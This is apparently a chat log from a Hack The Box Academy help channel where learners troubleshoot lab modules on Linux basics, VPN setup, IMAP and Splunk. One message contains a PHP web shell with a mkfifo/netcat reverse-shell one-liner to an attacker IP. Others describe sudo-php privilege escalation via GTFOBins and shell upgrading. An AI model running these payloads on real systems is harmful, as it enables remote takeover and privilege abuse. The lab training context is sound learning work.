tbh the man page for ||env|| mainly takes about stuff that isnt showing the list of current environment variables

or even just run things go brr. whats the worst that can happen? I obliterate my system on accident and have to revert my VM? Oh no! anyways

I don't have the permission to use env

????

You definitely should

I did ||man env|| and couldn't understand the description

env is a core utility, im not sure how youd even block it without breaking things

and thx for the answer of the question but what's the reason that answer is correct?

the env command does allow you to run a command with custom variables

imo its def one that makes more sense if you just run it

It's like alias

You can set something with alias. But if you run it on its own, you get a list of all aliased commands

ye tbh i have screwed up linux installs bad enough to break those things in the past but it takes some doing

Yeah it happens

This is why snapshots are important for vms

And backups for live systems

Because that's what the MAIL environment variable is set to

for the question + 0 Which shell is specified for the htb-student user? how I can do ?

env also works here too :)

take another look at the output from env

Look for the variable that would likely be it

You can also echo variables;
echo $VAR will print the value of that variable

ok but the file don't exist

Doesn't matter if it doesn't exist

That's what it's set to

ok thx

If you're looking for "something" in the env output, it might be easier to sort it: env | sort or search it: env | grep -i something

To get Kernel version all you do is || uname -r || right?
What is the ||-123-generic referring to?||

4.15.0

Release version

env don't works

Thanks :)
Should eb good now hopefully can manage the rest on my own

Env should work, you're ssh into the target htb-student@ip yea?

yes

Then env should work

verify your account with #welcome and then you can send images. Share screenshot of env not working

ok ok that's works thx guys

sorry i don't write correctly the command

Yeah writing commands incorrectly tends to be a problem

I was troubleshooting a tier 3 module section yesterday for like a half hour because I accidentally wrote TEAMSRV in my cmds instead of TERMSRV

it happens lul

I don't have the good answer when I write License GPLv3+

I make mistakes??

It happens

I am trying to connect to target I spawned nin linux fundementals it says port 22 blocked

I am very new at networking and remote accessing

please help?

are you trying to connect from the pwnbox or from your own machine?

my own machine

should I from my physical machine? or VM?

are you connected to the vpn? (with correct config for the region the target is in)

i would recomment using a VM but that shouldnt affect the ability to connect

No, I am kinda lost on how to set up the VPN

hey, is this a valid code for the nibbles section in the getting started section? <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

i downloaded the file

What section?

I know one of the sections uses a public ip and port

linux and windows fundementals I couldnt RDP or SSh

Then it's likely you need to start the vpn

i dont think that matters much, its just that the php doesnt seem okay

atleast when i curl it it prints nothing

sudo openvpn /path/to/academy-regular.ovpn

Replace 10.10.14.2 with your tun0 ip

ik

😦

Also do you have the netcat listener running when you curl it?

It should hang if it's done properly

yes

And your listener will have a connection

the curl ends and then nothing happens

is it okay if i have openvpn on the app?

and not on the machine?

?

The vpn is only required if you're using your own vm

like this

You should be running the vm in your Linux vm

okok

u mean the vpn?

Yes

If you're using the in-browser vm: then you don't need the vpn at all

nope

thank you so much!

for rev shells you need the vpn and netcat listener to be running in the same place

having vpn on host and you working in vm will only work for you connecting to things

not having them connect back to you (which is what the rev shell tries to do)

Yup

can i bg the vpn process?

using the & symbol

i think so

how would you do that? sudo openvpn /path/to/academy-regular.ovpn & like so?

tbh i just run it in a different tab

fair enough

Yeah, I wouldn't recommend backgrounding it though

i wanted to make a .zshrc file with that

In the event that you need to verify the connection works

particularly since i learnt about tmux i dont really use regular backgrounding anymore :p

okok, thats a good call

Meh it's not worth, because in the event you need to swap the vpn region you'd need to kill and restart the vpn with the new config

i have a few issues with tmux, its weird

u cant scroll up if u divide the screen

I dont use tmux

i wanst replying to you, sorry, it was a mistake xD

I just use the basic gnome terminal

.

I've just found tmux too clunky for me

¯_(ツ)_/¯

i never got mouse scrolling to work but you can do [ to enter copy mode and then up/down arrows to scroll

btw, do you guys also have a sort of lag when using the arrow keys in the terminal in your vm? not the browser one

it did take me a while to get used to but now i cant believe how long i went without it

Nope

i have this issue and i have no clue why, i feel like i allocated enough cores and RAM

what do you use to switch between terminals

I just use ctrl-tab

I think ctrl-shift-t to create a new tab

Alt tab

I take advantage of the "workspaces" thing having my openvpn running in one workspace screen and use the other to do stuff, so I don't accidentally close it

ah

what host os/hypervisor?

tmux is useful when you have many terminals open, I usually have 11 open at any given time and it's easy to switch and manage them

though the default keybinds suck

Windows 11

I just never bothered to learn or cared to learn

Why break what works

its not all that hard, its just annoying to hit the prefix [ctrl + B ]

I just don't like reteaching myself muscle memory

if you are using virtualbox you need to make sure hyper-v and a bunch of other windows services (eg memory core isolation) that use hyper-v behind the scenes are disabled

possibly (likely) that is true for vmware etc too or basically anything except hyper v itself

Hey! I need some help on the "Introduction to Digital Forensics" module. I am on the Skills Assessment and I am only missing one answer. I am pretty sure it is correct, but the answer is still wrong

To clarify, it is this question: Determine the registry key used for persistence and enter it as your answer.

Edit: Nevermind, I was being super dumb (although my initial answer seems to be okay too 🤔 )

I'm mostly requesting someone who has done the module for a check in DMs

How do I set up VPN on workspaces?

Download the vpn in the vm

And what do you mean by workspaces

download the .ovpn file from HTB into your VM, then run sudo openvpn {path to the file}

btw, is the reverse shell supposed to be super slow?

it shouldn't be that slow

sometimes it reponds super fast

other times it just hangs

you might need to change vpn regions or (if you're not already) use the tcp vpn

how do i do that?

on the page; there should be a section for the vpn that'll have a dropdown menu for the vpn

and 2 buttons, one for udp and one for tcp

i just did that

wait

this just made it 1000x better

Still didn't work. Can I dm you?

Footprinting IMAP/POP3 can I get a nudge in the right direction please

Connecting to the server gave me a email address but its not the right one. I found an article on imap commands but none of them are giving me what I need

hello i think find the server name of the hote but he don't work :https://academy.hackthebox.com/module/144/section/1311

for imap commands, don't forget to use A1 Login password and then make your move

I logged in and the commands work I just dont know which command to use to get what I need

Heyo having some issues with the Broke Auth - Predictable Reset Token module, specifically question 1.

you are select a inbox ?

https://www.atmail.com/blog/imap-commands/

Found that too but still confused. I think Im starting to put the pieces together though

I am grabbing the date from the user response and converting to epotch. Multiplying by 1000 to get milliseconds then hitting every millisecond in a 3 second window but still no dice. Any help would be appreciated.

process : poster they inbox, select a mailbox with content, display first the mail object then the content, but there's a command that lets you do both. I'll leave you to look for it.

sorry not yet done

anyone for my problem ?

Here is a screen shot of my code running! JK I can not get a photo but here is a snippet "Token Request Time~1706174414000 Token:abe293eeae659a328159c7d712057f52 String:htbadmin1706174412382 Req Status:<Response [200]>"

Here is some additional information

Script Output

Token Req Status: <Response [200]>
Request Date: Thu, 25 Jan 2024 02:43:44 GMT
Dt Object: 2024-01-25 02:43:44
Time Stamp Request Tranlated: 1706175824000
System Time: 1706150624000

Sample Code of the Time Conversion
data = {"submit": "htbuser"}
date = requests.post(url, data)

dt_object = datetime.strptime(str(date.headers["Date"]), "%a, %d %b %Y %H:%M:%S %Z")

print("Token Req Status:", date)
print("Request Date:", str(date.headers["Date"]))
print("Dt Object:", dt_object)
print("Time Stamp Request Tranlated:", int(dt_object.timestamp()) * 1000)
print("System Time:", int(time()) * 1000)
exit()

There may be difference between FQDN, domain name , server name ?

Hi bro, I had the same problem, did you solve it?

Hi i solve it thanks

what is imap

Internet message access protocol??

so i shelled into the place.. confused what i do next

Lol when I ask google to epotch time it says something different but when I use that value it doesnt work. L8r

yo vnk

Module : SQLMap Essential : Running SQLMap on an HTTP Request (https://academy.hackthebox.com/module/58/section/517)
Even though I did find the flag using sqlmap, can I dm someone for help I want to explioit it manually.

Yup @idle nebula ?

is there a way to use the attackbox for free using a pn

vpn

pwnbox ? I think you get 1 free spawn/day

oh sweet preciate it

sorry i cant really help u with exploiting this room manually

i still dont the basic fuindamental commands

like how to use nmap or gobuster

Its fine that was for other members

i just know ls adn cd and yeah

and

is hackthebox for intermidiate hackers?

When I started I was not intermediate

I see

This is resolved*

wish i could help u out man

Anyone know how to escalate privilege to root after I gain a foothold on a server ?

I was told to use the shell command but I’m stuck now

because that's not the host

so you're on

you can either transfer over linPeas

OR run sudo -l

:)

It says sudo -1 is an invalid option

that's an L

Hey marcie ☺️ Yes, I know I understood it after 🫣

not a 1

Oh

It works now

i remeber this from somwhere, but what do i do with the info

well you'll see you can run something with sudo; use gtfobins to see how to take advantage of it

I ran it… just went blank

https://medium.com/@rebaleos0/privilege-escalation-all-all-nopasswd-usr-bin-php-241a2c43e58d?

https://gtfobins.github.io/gtfobins/php/#sudo

it's really that simple, a couple lines

if you don't close the quotes then it's likely waiting for you to close the quotes

i get an "(" erorr

/bin/sh: 1: Syntax error: "(" unexpected

screenshot your terminal

bc you're likely misreading or misunderstanding something

Wait

Vim or Nano ?

1 sec and then I will

personal preference

I like your mindset , your a rational human

¯_(ツ)_/¯

i mean it's as shrimple as that

people like to use nano, and people like to use vim; and this isn't really the place to have that discussion/argument

So @fathom pendant you in the industry ?

nope

Just a hobby for you?

yep

What side of IT do you prefer ?

Hacking only ?

this isn't the place for this conversation, this isn't a gen chat - read #welcome

hi, have u solve this, facing same issue, already renew like bunny said but still not work

what does your CMD= line look like

There was statement in modules I remember along the line ......finding out they are a nano user😅 😂

tried it a few ways

what is my issue?

should I be running this script from a file on my computer other than my console?

hi, how u solve this ?
what step the module doesn't show

it should be in the meterpreter session

and I just did it and it works fine on mine

ah ik what happened

you copied from the medium post which has the weird quotes

so it copied it weirdly

"/bin/sh"

look at how the quotes curve instead of being straight on the first one after your cmd=

Here is what I said: first use PowerView to identify a Domain Admin you want to target with the PrintSpool attack

Dc01 right ?

I would think so..sorry, it has been a few months since I took that module

meterpreter says sudo cannot be used as a command

i can do it in the shell though

The module doesn't show you which domain admin to target, so I had to first use PowerView to find the Domain Admin

yes you do it from the shell; which is the meterpreter session

try typing out CMD="/bin/sh" instead of copy/pasting

ok thanks

ok I did

now run the php command again

and then do whoami

Ayoooo

I was thinking something would output

No wonder I was stuck

nah this shell is dumb

Whoooop thanks Marcie

whenever you run a command that's meant to escalate your privs, always check whoami

thanks solved

You're welcome! Congrats!

also if you upgrade your shell with python3
python3 -c "import pty; pty.spawn('/bin/bash');"you'd get the familiar terminal line btw

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

Stucked so long from the Introduction To Splunk & SPL

what I have used

||EventCode=4624 | stats range(_time, 0, 10m)||

yea that question is super weird, try to instead find the accounts where between the first and last login event less than 10m have passed. And then take the one with the most log in attempts. The account in question only logged in to any machines in a 10m time window and never before and never again after

linux PrivEsc module - Environment Enumeration
flag not working?

made sure no spaces before or after

you probably found a flag for the later questions, what's the first and last letter

S - d

yeah wrong flag

lmao

next question asks for python version and the one after it spawns new target